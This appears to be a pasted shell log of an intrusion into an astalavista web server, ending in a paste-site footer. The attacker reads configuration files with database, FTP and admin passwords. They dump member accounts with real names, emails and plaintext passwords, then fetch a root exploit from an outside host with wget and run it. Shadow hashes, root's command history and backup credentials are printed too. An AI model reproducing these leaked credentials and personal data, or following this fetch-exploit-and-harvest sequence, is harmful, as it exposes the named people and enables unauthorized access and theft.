- -rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
- -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
- drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
- drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
- -rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
- -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
- -rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
- -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
- -rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
- -rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
- -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
- drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
- drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
- drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
- drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
- drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
- drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
- drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
- -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
- drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
- -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
- drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
- drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
- drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
- drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
- drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
- drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
- drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
- drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
- -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
- drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
- sh-3.2$ head -20 index.php
- <?PHP
- /**
- * Mainfile (external) for astalavistaNET v2.0
- *
- * @copyright Astalavista IT Engineering GmbH
- * @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
- * @version 1.0
- */
- if ($_SERVER['PHP_SELF'] == '/webcash.php') {
- $dontStartSession = false;
- } else {
- $dontStartSession = true;
- }
- require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
- require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
- require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
- require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');
- sh-3.2$ cd config
- sh-3.2$ ls -la
- total 32
- drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
- -rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
- -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
- -rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
- -rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php
- sh-3.2$ cat com.conf.php
- [snip]
- //member-database
- $_CONFIG['db_mem_server'] = 'localhost';
- $_CONFIG['db_mem_database'] = 'astanet_membersystem';
- $_CONFIG['db_mem_user'] = 'astanet_db';
- $_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
- $_CONFIG['db_mem_debug'] = false; //true or false
- //ads-database
- $_CONFIG['db_ads_server'] = 'localhost';
- $_CONFIG['db_ads_database'] = 'astanet_ads';
- $_CONFIG['db_ads_user'] = 'astanet_db';
- $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
- $_CONFIG['db_ads_debug'] = false; //true or false
- //rainbow-database
- $_CONFIG['db_rainbow_server'] = '212.254.194.163';
- $_CONFIG['db_rainbow_database'] = 'rainbow';
- $_CONFIG['db_rainbow_user'] = 'dinu';
- $_CONFIG['db_rainbow_password'] = 'dinudinu';
- $_CONFIG['db_rainbow_debug'] = false; //true or false
- //mailing lists database
- $_CONFIG['db_mailing_lists_server'] = 'localhost';
- $_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
- $_CONFIG['db_mailing_lists_user'] = 'astanet_db';
- $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
- $_CONFIG['db_mailing_lists_debug'] = false; //true or false
- //paypal
- $_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
- $_CONFIG['sub_pp_cmd'] = '_xclick';
- $_CONFIG['sub_pp_business'] = 'info@astalavista.net';
- $_CONFIG['sub_pp_noship'] = '1';
- $_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
- [snip]
- sh-3.2$ cd ..
- sh-3.2$ cd member
- sh-3.2$ ls -la
- total 20
- drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
- -rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
- sh-3.2$ cat .htaccess
- SecFilterEngine off
- sh-3.2$ cd ..
- sh-3.2$ cd cron
- sh-3.2$ ls -la
- total 168
- drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
- -rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
- -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
- -rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
- -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
- -rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
- -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
- -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
- -rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
- -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
- -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
- -rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
- -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
- -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
- -rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
- -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
- -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
- -rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
- drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
- -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
- -rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
- sh-3.2$ cd ..
- sh-3.2$ cd _007
- sh-3.2$ ls -la
- total 24
- drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
- -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
- -rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
- drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
- sh-3.2$ cat .htaccess
- authType Basic
- authName Admin
- authUserFile /home/astanet/auth/.htadm_pwd
- require valid-user
- sh-3.2$ cat /home/astanet/auth/.htadm_pwd
- admin2net:CR0bl65MwhfT
- sh-3.2$ mysql -u astanet_db -p
- Enter password:
- Welcome to the MySQL monitor. Commands end with ; or \g.
- Your MySQL connection id is 275153
- Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
- mysql> show databases;
- +-----------------------+
- | Database |
- +-----------------------+
- | information_schema |
- | astanet_ads |
- | astanet_mailing_lists |
- | astanet_mediawiki |
- | astanet_membersystem |
- | test |
- +-----------------------+
- 6 rows in set (0.00 sec)
- mysql> use astanet_membersystem
- Database changed
- mysql> show tables;
- +-----------------------------------+
- | Tables_in_astanet_membersystem |
- +-----------------------------------+
- | blacklist_categories |
- | blacklist_content |
- | blacklist_levels |
- | blacklist_mcset |
- | dir_categories |
- | dir_comments |
- | dir_links |
- | dir_temp |
- | dir_votes |
- | documents |
- | documents_categories |
- | email_content |
- | email_settings |
- | exploits |
- | exploits_categories |
- | exploittree_categories |
- | exploittree_exploits |
- | home_values |
- | iso_countries |
- | links_categories |
- | links_records |
- | links_unauth |
- | links_votes |
- | log |
- | news_categories |
- | news_comments |
- | news_emoticons |
- | news_latest |
- | news_messages |
- | news_statistics |
- | news_votes |
- | prices_content |
- | prices_offers |
- | rss_settings |
- | sessions |
- | stats_signups |
- | u2u2 |
- | u2u_contact |
- | u2u_settings |
- | user_keywords_selected_categories |
- | users |
- | users_ipn_test |
- | users_keyword_values |
- | users_profile |
- | users_temp |
- | users_upgrade |
- +-----------------------------------+
- 46 rows in set (0.00 sec)
- mysql> describe users;
- +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
- | Field | Type | Null | Key | Default | Extra |
- +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
- | primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
- | user | varchar(50) | NO | | | |
- | nickname | varchar(30) | NO | MUL | anonymous | |
- | password | varchar(30) | NO | | | |
- | userlevel | tinyint(3) | YES | MUL | NULL | |
- | exp | int(8) unsigned | NO | | 0 | |
- | email | varchar(50) | NO | | | |
- | ip | varchar(15) | NO | | 0 | |
- | proxy | set('0','1') | NO | | 0 | |
- | logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
- | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
- | anz_in | tinyint(1) | NO | | -1 | |
- | status | tinyint(1) unsigned | NO | | 0 | |
- | checked | set('0','1','2') | NO | | 0 | |
- | freemember | set('0','1') | NO | | 0 | |
- | ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | |
- | lang | tinytext | NO | | | |
- | adid | smallint(6) | NO | | 0 | |
- | pp_txn_id | varchar(255) | YES | | NULL | |
- | cnb_transaction_id | varchar(255) | YES | | NULL | |
- | cnb_order_id | varchar(255) | YES | | NULL | |
- | cnb_user_id | int(11) | YES | | 0 | |
- +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
- 22 rows in set (0.01 sec)
- mysql> select count(*) as skids from users;
- +-------+
- | skids |
- +-------+
- | 25199 |
- +-------+
- 1 row in set (0.00 sec)
- mysql> select user,nickname,password,email from users where userlevel = 1;
- +--------------------------+----------------------+------------------+-----------------------------------+
- | user | nickname | password | email |
- +--------------------------+----------------------+------------------+-----------------------------------+
- | pascal | prozac | astaman3 | info@astalavista.net |
- | Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com |
- | qreymer | Palermo | qblsw85iam | eche@home.se |
- | Christian Wehrli | g0atherd | hitt?74 | g0atherd@gmx.net |
- | Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk |
- | Martin Wyss | dinu | kj63;cXy | martin.wyss@astalavista.net |
- | Leandro Nery | Timan_no_Sanco | nery2002 | leandronery@hotmail.com |
- | shaving ryans privates | ShavingRyansPrivates | memberboard313 | shavingryansprivates1@hotmail.com |
- | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | spoofedexistence@hotmail.com |
- | David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
- | David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net |
- | Thomas Kalin | Gwanun | QwErTy123 | thomas.kaelin@astalavista.net |
- | Marcus unknown | Cra58cker | hhCr4ck06 | unknownmarcus@hotmail.com |
- | David Ellis | dellis203 | philip | dellis@nightwatchnss.com |
- | Lars Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com |
- | Paulo Santos | Be1er0ph0r1 | amor01 | pmsantos@gmx.ch |
- | Thomas D?ppen | daha | asta4tom | thomas.daeppen@astalavista.ch |
- | Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com |
- | Fabius Bernet | traviser | wellenreiter100 | fabius.bernet@astalavista.ch |
- | Zachary McElroy | duder1 | dirty245dix | mcelroyzj@yahoo.com |
- | Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com |
- | Beatriz Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com |
- | Glafkos Charalambous | anonymous2086 | si99490178$# | nowayout@webhostline.com |
- | developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch |
- | Peter Fisher | cyph3r1 | testZer025435 | cyph3r@astalavista.com |
- | sykadul | sykadul | ak29eral | sykadul@gmail.com |
- | Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch |
- +--------------------------+----------------------+------------------+-----------------------------------+
- 27 rows in set (0.00 sec)
- mysql> exit;
- Bye
- [~] plaintext passwords? yes,
- Those so called "security professionals" who charge you $6.66 / month to
- register at their hack-proof portal, save your passwords in plaintext...
- brilliant!
- [~] This been fun but we want more.
- sh-3.2$ uname -a
- Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- sh-3.2$ wget http://anti.sec.labs/g0troot
- --13:33:37-- http://anti.sec.labs/g0troot
- Resolving anti.sec.labs... 13.33.33.37
- Connecting to anti.sec.labs|13.33.33.37|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 18200 (18K) [text/plain]
- Saving to: `g0troot'
- 100%[=========================================================================================================================================>] 18,200 58.6K/s in
- 0.3s
- 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
- sh-3.2$ ./g0troot -i x86_64
- [+] g0troot - anti.sec.labs
- [+] Target: 2.6.18-128.1.10.el5
- [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
- [+] r00tr00t
- [~] Executing shell...
- sh-3.2# id
- uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- sh-3.2# cat /etc/shadow
- root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
- [snip]
- admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
- jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
- com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
- astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
- sh-3.2# cat /etc/motd
- #####################################################
- #____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
- # |__| [__ | |__| | |__| | | | [__ | |__| #
- # | | ___] | | | |___ | | \/ | ___] | | | #
- # #
- #####################################################
- # #
- # Admin Contact - support@secureservertech.com #
- # #
- # Available ShortCuts #
- # #
- # nst - list active connections #
- # ddos - shows how many times each ip is connected #
- # ltr - restart the webserver #
- # phpc - edit the php config file #
- # htc - edit the webserver configuration file #
- # up - uptime #
- # etd - edit the motd of the day file #
- # htr - start and restart apache if needed #
- # syng - shows active SYN_RECV connections #
- # synd - syn flood blocker - "synd -h" for usage #
- #####################################################
- # NOTES: #
- # Last Upgrade - 12-08-2008 by JF #
- # My.cnf/Mysql Optimization - 1-28-09 #
- # #
- # #
- # #
- #####################################################
- sh-3.2# lastlog | grep -v Never
- Username Port From Latest
- root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
- admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
- com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
- astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
- sh-3.2# ls -la
- total 453376
- drwxr-x--- 15 root root 4096 Jun 4 08:40 .
- drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- -rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
- -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
- -rw------- 1 root root 16836 Jun 4 07:21 .bash_history
- -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
- -rwx------ 1 root root 1899 Oct 28 2007 bk.sh
- -rw-r--r-- 1 root root 1327 Nov 29 2007 cert
- -rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
- drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
- -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
- -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
- drwx------ 2 root root 4096 Oct 28 2007 .elinks
- drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
- -rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
- -rw------- 1 root root 0 Apr 16 13:19 .history
- -rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
- -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
- -rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
- -rw------- 1 root root 35 Jun 2 14:23 .lesshst
- drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
- drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- -rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
- -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
- -rwx------ 1 root root 760 Sep 18 2008 lp
- drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
- -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
- -rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
- drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
- -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
- drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
- -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
- -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
- -rw------- 1 root root 41 Oct 19 2007 .my.cnf
- -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
- -rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
- -rw------- 1 root root 41 May 20 2008 .mytop
- drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
- -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
- drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
- -rw------- 1 root root 1462 Sep 21 2007 opt.php
- -rw-r--r-- 1 root root 3371 Sep 22 2007 p
- -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
- -rw------- 1 root root 1024 Feb 3 21:32 .rnd
- -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
- -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
- drwx------ 2 root root 4096 Oct 10 2008 .ssh
- -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
- -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
- -rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
- -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
- drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
- -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
- drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
- -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
- -rw------- 1 root root 12997 May 16 2008 .viminfo
- sh-3.2# cat .bash_history
- [snip]
- wget cp4sst.com/sstlinux.tar.gz
- tar zxvf sstlinux.tar.gz
- cd linux-2.6.27.10
- sh install.sh
- make bzImage ; make modules ; make modules_install ; make install
- make clean
- service mysqld restart
- [snip]
- cd /usr/sbin/
- chmod 4777 traceroute
- chmod 4777 ping
- traceroute -I www.astalavista.ch
- [snip]
- vi /etc/csf/csf.conf
- traceroute google.ch
- service csf restart
- tracert google.ch
- service csf restart
- traceroute www.google.ch
- tracert www.google.ch
- traceroute www.google.ch
- locate traceroute
- chown 4755 /bin/traceroute
- chown 4777 /bin/traceroute
- locate ping
- chown 4755 /bin/ping
- chown 4777 /bin/ping
- cd /bin/
- ls -ali | grep ping
- chown root ping
- chmod 4755 ping
- ls -ali | grep traceroute
- chown root traceroute
- chmod 4755 traceroute
- ls -ali | grep traceroute
- traceroute -I www.google.ch
- traceroute www.google.ch
- whois pmsantos.ch
- [snip]
- mysql -h com_contrexx2_live < /root/defaultp_ports.sql
- mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
- mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
- mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
- top
- ping ssth.ch
- ping asdlkfaljgasd???ljg???lasj.ch
- ping asdlkfaljgasdlasj.ch
- ping www.ssth.ch
- ping ssth.ch
- nslookup www.google.ch
- nslookup www.ssth.ch
- man nslookup
- ping www.google.ch
- nslookup www.google.ch
- nslookup www.google.ch
- nslookup salfjasdlf.ch
- [snip]
- openssl passwd -1 sadf
- openssl passwd -1 5cZNHstdTy
- mysql
- mysql
- locate proftp
- vi /etc/proftpd.passwd
- service proftpd restart
- locate proftpd.conf
- vi /etc/proftpd.conf
- vi /etc/proftpd.passwd
- service proftpd restart
- [snip]
- /bin/sh /home/com/backup_system/backup.sh
- tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
- mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
- mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
- ls -ali
- mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
- mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
- crontab -l
- crontab -l
- php -q /home/com/public_html/modifications/cronjobs/securitynews.php
- /home/com/public_html/modifications/cronjobs/exploits.sh
- wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
- tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
- cd lsws-4.0.3
- sh install.sh
- uptime
- hdparm -tt /dev/sda
- iostat
- yum install iostat
- iostat
- whereis iostat
- yjm clean all
- yum clean all ; yum -y update
- iostat
- yum install systat
- rpm -qa | grep iostat
- rpm -qa | grep sysstat
- rpm -qa | grep systat
- dmesg -c
- sysctl -p
- uname -r
- cd /usr/src
- wget nix101.com/kernels/sstlinux.tar.gz
- shutdown -r now
- nano -w /boot/grub/grub.conf
- sh-3.2# cat .my.cnf
- [client]
- user=da_admin
- password=X9dctmRH
- sh-3.2# cat /home/com/backup_system/backup.sh
- #!/bin/sh
- #####################################################################
- # #
- # incremental backup for astalavista.com #
- # #
- # author: Paulo M. Santos <paulo.santos@astalavista.com> #
- # #
- #####################################################################
- [snip]
- PROG_DIR="/home/com/backup_system";
- BACKUP_DIR="/home/com/backups";
- DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
- # ftp for synology backup server
- FTP_HOST="212.254.194.163";
- FTP_PORT="21";
- FTP_USER="astalavista.com";
- FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
- FTP_DIR="/astalavista.com";
- # database
- DB_HOST="localhost";
- DB_USER="contrexxuser2";
- DB_PASS="0fEYNZgXz1pKe";
- DB_DATABASE1="com_contrexx2_live";
- DB_DATABASE2="com_contrexx2";
- [snip]
- ftp -in $FTP_HOST $FTP_PORT <<EOF
- quote USER $FTP_USER
- quote PASS $FTP_PASS
- cd $FTP_DIR
- put $DB_FULLNAME-SQL_Dump.tar
- put $BACKUP_FULLNAME-Public_HTML.tar
- close
- bye
- EOF
- sh-3.2# cd /home
- sh-3.2# ls -la
- total 120
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
- drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
- -rw------- 1 root root 8192 Jun 4 03:03 aquota.group
- -rw------- 1 root root 8192 Jun 3 02:45 aquota.user
- drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
- drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
- drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
- drwx--x--x 10 com com 4096 Apr 28 12:40 com
- drwxr-xr-x 2 root root 4096 May 17 2007 ftp
- drwx------ 3 jon jon 4096 Sep 21 2007 jon
- drwx------ 2 root root 16384 Sep 11 2007 lost+found
- drwxr-xr-x 2 root root 4096 Sep 14 2007 my
- drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
- drwx------ 2 jon jon 4096 Sep 15 2007 test
- drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
- sh-3.2# cd admin
- sh-3.2# ls -la
- total 1735896
- drwx--x--x 9 admin admin 4096 Nov 28 2007 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- drwx------ 2 admin admin 4096 Sep 28 2007 backups
- -rw------- 1 admin admin 860 Sep 17 2008 .bash_history
- -rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
- -rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
- -rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
- drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
- drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
- drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
- -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
- drwx------ 2 admin admin 4096 Sep 21 2007 mail
- -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
- -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
- -rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
- -rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
- drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups
- sh-3.2# ..
- sh-3.2# cd jon
- sh-3.2# ls -la
- total 36
- drwx------ 3 jon jon 4096 Sep 21 2007 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- -rw------- 1 jon jon 53 Sep 21 2007 .bash_history
- -rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
- -rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
- -rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
- -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
- drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
- sh-3.2# cd ..
- sh-3.2# cd test
- sh-3.2# ls -la
- total 48
- drwx------ 2 jon jon 4096 Sep 15 2007 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- -rw--
Add Comment
Please, Sign In to add comment